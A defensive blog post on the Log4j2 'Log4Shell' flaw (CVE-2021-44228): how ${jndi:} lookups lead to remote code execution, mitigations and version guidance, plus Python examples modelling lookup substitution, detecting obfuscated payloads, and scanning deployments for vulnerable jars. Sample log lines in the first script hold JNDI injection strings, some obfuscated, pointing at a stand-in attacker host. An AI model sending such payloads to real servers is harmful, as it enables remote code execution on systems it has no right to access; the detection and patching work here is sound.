Log4j2 major vulnerabilities and Solutions
2022-07-06 16:59:00 【Xiaoxiamo】
Background
10 December 2021 should have been an ordinary day, but WeChat Moments, forums, public accounts and group chats were all discussing one Log4j2 vulnerability, and countless programmers got up in the middle of the night to patch code. The bug threatens network security worldwide; companies reported to have been affected include, but are not limited to, Apple, Amazon, Tesla, Google, Baidu, Tencent, NetEase, JD.com, Twitter and Steam. Why did this vulnerability cause such a strong reaction? There are several reasons:
1. Wide coverage (any project that uses Log4j2 is at risk)
2. Easy to exploit (a single crafted string is enough to compromise the server)
3. High impact (the attacker gains the privileges of the application process)
4. Long tail (expect this bug to keep surfacing for years; any service that is not updated stays vulnerable)
As far as is known, the vulnerability was first discovered by an Alibaba employee. On 24 November 2021 the Alibaba Cloud security team reported the Apache Log4j2 remote code execution vulnerability (later assigned CVE-2021-44228) to Apache, and on 9 December more details were made public.
Introduction to Log4j2
What is the Log4j2 that caused such a large-scale security problem, and what is it for? Log4j2 is an Apache project: a Java logging library. It makes it easy to control whether log messages are emitted, their type, output destination and output format, giving fine-grained control over the logging process through a configuration file rather than code changes, which is why so many Internet companies use it. The project was rewritten in 2014 as Log4j 2, with many new features, and it is this rewritten version that carries the bug. The rewritten framework is widely used in business systems to record log information. The main victims are therefore Java applications that use Log4j2 (Log4j 1.x does not contain the JNDI lookup and is not affected by this issue, though it has been end-of-life since 2015). Common open source projects affected include spring-boot-starter-log4j2, Apache Solr, Apache Flink, Apache Druid, Elasticsearch, Flume, Dubbo, Logstash, Kafka and others.
How the vulnerability works
How does the Log4j2 bug do its damage? It is very simple: think of SQL injection, but more powerful, because this is direct code injection, and the injected code naturally runs with the application's privileges. A utility whose only job is to print logs ended up opening the village gate to the devil.
The core principle: when a log message is formatted, any substring of the form ${ } is treated as a lookup expression, and the contents of the braces are replaced with the value the lookup resolves to. Log messages routinely contain attacker-controlled input (a User-Agent header, a username, a search string), so the attacker can make that lookup a JNDI lookup pointing at a server they control and have Log4j fetch and execute attacker-supplied code. The detailed disclosure can be viewed at https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues
The root cause is the Lookup plugin mechanism in Log4j2. Lookups are rarely used deliberately, but the code path is exercised constantly: every info, warn or error call that writes a log line passes the formatted message through the lookup substitution, so every such call is a chance to trigger it. The dangerous lookup is JndiLookup. JNDI (Java Naming and Directory Interface) locates data and objects by name, and it can resolve a name through remote protocols such as LDAP and RMI (Remote Method Invocation). If the name in ${jndi:...} points at a host the attacker controls, that server answers with a reference to a class hosted wherever the attacker likes (or with a serialized payload that a library already on the classpath will happily deserialize), the JVM loads it inside your application, and your service host is meat on the chopping board.
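To make the lookup mechanism above concrete, here is an added example (written for this page, not Log4j's own code). It reimplements just enough of the ${...} substitution rules to show how a logged string turns into a JNDI lookup, what the formatMsgNoLookups switch and the later "JNDI disabled" default change, and why a detection rule has to normalise nested lookups such as ${${lower:j}ndi:...} and ${::-j} before looking for the jndi prefix. The host attacker.example, the sample log lines and all function names are constructed for illustration; the jndi lookup is stubbed to raise an exception instead of opening a connection.

```python
"""Toy model of Log4j 2 message lookups (CVE-2021-44228); added example, not Log4j code."""
import re


class JndiLookupAttempted(Exception):
    """Stands in for Log4j actually contacting the LDAP/RMI server."""


def _lookup(prefix, key, jndi_enabled):
    # Modelled subset of Log4j's built-in lookups (real Log4j also has env,
    # sys, ctx, date, ...). Prefixes are case-insensitive, as in Log4j.
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "jndi":
        if not jndi_enabled:            # 2.16.0+: JNDI off unless log4j2.enableJndi=true
            return None
        raise JndiLookupAttempted(key)  # pre-2.16: InitialContext.lookup(key)
    return None                         # unknown prefix: nothing resolved


def _match_close(text, start):
    """Index of the '}' that closes the '${' at `start`, honouring nesting."""
    depth, i = 0, start
    while i < len(text):
        if text.startswith("${", i):
            depth, i = depth + 1, i + 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def _resolve(var, jndi_enabled):
    # '${name:-default}' falls back to the default when the lookup yields nothing;
    # this is what makes '${::-j}' evaluate to the letter 'j'.
    name, default = var.split(":-", 1) if ":-" in var else (var, None)
    prefix, _, key = name.partition(":")
    value = _lookup(prefix, key, jndi_enabled)
    if value is None:
        value = default
    return "${" + var + "}" if value is None else value  # unresolved stays verbatim


def substitute(text, jndi_enabled=True):
    """Resolve every ${...} in text, innermost expression first, as Log4j does."""
    out, i = [], 0
    while i < len(text):
        if text.startswith("${", i):
            close = _match_close(text, i)
            if close == -1:
                out.append(text[i:])
                break
            inner = substitute(text[i + 2:close], jndi_enabled)  # nested lookups first
            out.append(_resolve(inner, jndi_enabled))
            i = close + 1
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def log_message(message, format_msg_no_lookups=False, jndi_enabled=True):
    """What a vulnerable build does with an already formatted message.
    format_msg_no_lookups models -Dlog4j2.formatMsgNoLookups=true (2.10 to 2.14.1);
    jndi_enabled=False models 2.16.0+, where JNDI lookups are off by default."""
    return message if format_msg_no_lookups else substitute(message, jndi_enabled)


JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(line):
    """Collapse nested/obfuscated lookups without performing any JNDI lookup."""
    return substitute(line, jndi_enabled=False)


def is_jndi_injection(line):
    return JNDI_RE.search(normalise(line)) is not None


SAMPLE_LINES = [  # constructed access-log lines, not real traffic
    '10.0.0.5 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.7 "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.68.0"',
]


def scan(lines):
    """Return (index, normalised_line) for every line that carries a JNDI lookup."""
    return [(i, normalise(line)) for i, line in enumerate(lines) if is_jndi_injection(line)]


if __name__ == "__main__":
    try:
        log_message(SAMPLE_LINES[2])
    except JndiLookupAttempted as exc:
        print("vulnerable build would contact:", exc)
    print("2.16+ build writes:", log_message(SAMPLE_LINES[2], jndi_enabled=False))
    for idx, norm in scan(SAMPLE_LINES):
        print(f"line {idx}: {norm}")
```

Note that a plain grep for the literal string ${jndi: catches only the first of the three malicious sample lines; the other two only reveal the jndi prefix after normalisation. The formatMsgNoLookups switch only protects the message text: lookups placed in the layout pattern of the logging configuration (for example ${ctx:loginId}) were still resolved, which is the reason 2.16.0 removed message lookups altogether and turned JNDI off by default.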
Solutions
Option 1: Drop Log4j2 entirely
Be careful here: not finding a direct dependency in your project does not mean Log4j2 is absent. It is frequently pulled in transitively (for example through spring-boot-starter-log4j2 or a third-party library), so search the whole dependency tree (mvn dependency:tree, or gradle dependencies) and the deployed artefacts themselves, including jars nested inside fat jars and wars.
Option 2: Upgrade to 2.15.0 or later
As of 14 December 2021 the project had already reached 2.16, after several rapid releases in a few days; it is recommended to update to at least 2.15.0. Caveat for anyone reading this later: the fix in 2.15.0 turned out to be incomplete (CVE-2021-45046), 2.16.0 removed message lookups and disabled JNDI by default, and 2.17.0 and 2.17.1 fixed further issues, so the versions to target are 2.17.1 or later for Java 8, 2.12.4 for Java 7 and 2.3.2 for Java 6.
Releases: https://github.com/apache/logging-log4j2/tags
Option 3: Change the JVM startup parameters
Some projects have complex dependencies and cannot easily be rebuilt. They can be started as they are with the following JVM parameter, which stops lookups from being applied to log messages:
-Dlog4j2.formatMsgNoLookups=true
Caveats: this switch only exists in versions 2.10 through 2.14.1 (the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true has the same effect there); on older 2.x versions it does nothing, and it does not cover lookups configured in the layout pattern itself. For versions where the flag is unavailable, or as an extra safeguard, the Apache-recommended mitigation is to delete the class org/apache/logging/log4j/core/lookup/JndiLookup.class from the log4j-core jar and restart the service.
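The three options above all depend on first knowing which copies of log4j-core are actually deployed, including the ones a `find` for log4j-core-*.jar misses because they sit inside a fat jar or war. The following added example (written for this page, not a project tool) walks a directory tree, recurses into nested archives, reads the version from the Maven pom.properties that ships inside log4j-core, classifies each copy against the fixed-version list on the Apache Log4j security page, and implements the "remove JndiLookup.class" mitigation as a jar rewrite. So that it runs offline it builds constructed stand-in jars in a temporary directory; the function names and the layout of the demo deployment are assumptions, and the scanner will miss shaded or relocated copies that do not carry pom.properties.

```python
"""Locate deployed log4j-core copies and judge CVE-2021-44228 exposure; added example."""
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0)."""
    parts = []
    for piece in text.split("-")[0].split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple((parts + [0, 0, 0])[:3])


def classify(version, has_jndi_lookup):
    """Verdict per the Apache advisory: 2.16.0+ (Java 8), 2.12.2+ (Java 7) and
    2.3.1+ (Java 6) close CVE-2021-44228 and CVE-2021-45046; 2.15.0 closed only
    the former; deleting JndiLookup.class from an older jar is the vendor-endorsed
    stopgap."""
    v = parse_version(version)
    if v >= (2, 16, 0) or (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0):
        return "fixed"
    if v == (2, 15, 0):
        return "partial fix only (CVE-2021-45046): upgrade"
    if not has_jndi_lookup:
        return "mitigated (JndiLookup.class removed): upgrade when possible"
    return "VULNERABLE (CVE-2021-44228)"


def inspect_archive(data, location):
    """[(location, version, has_jndi_lookup, verdict)] for every log4j-core in
    the archive bytes, descending into nested archives (fat jars, wars, ears)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            version = "unknown"
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
            has = JNDI_CLASS in names
            findings.append((location, version, has, classify(version, has)))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(name), f"{location}!/{name}"))
    return findings


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def remove_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (same effect as
    `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`)."""
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)


def build_fake_log4j_core(version, with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar; carries no real classes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo():
    """Lay out a constructed deployment in a temp dir, scan it, mitigate, rescan."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(build_fake_log4j_core("2.14.1"))
    # A Spring Boot style fat jar hiding a second copy that a filename search misses.
    with zipfile.ZipFile(os.path.join(root, "app.jar"), "w") as app:
        app.writestr("BOOT-INF/lib/log4j-core-2.15.0.jar", build_fake_log4j_core("2.15.0"))
    before = scan_tree(root)
    remove_jndi_lookup(os.path.join(lib, "log4j-core-2.14.1.jar"))
    return before, scan_tree(root)


if __name__ == "__main__":
    for stage in demo():
        for loc, ver, has, verdict in stage:
            print(f"{loc}: {ver} JndiLookup={'yes' if has else 'no'} -> {verdict}")
```

On a real host, call scan_tree on the deployment root (or on the container image's filesystem) instead of running demo; the nested-archive recursion is what turns up the copies bundled inside Spring Boot jars and wars. Treat "mitigated" as a temporary state: the class removal stops the JNDI lookup but the remaining lookups still run, and only an upgrade to the fixed release lines removes the later issues.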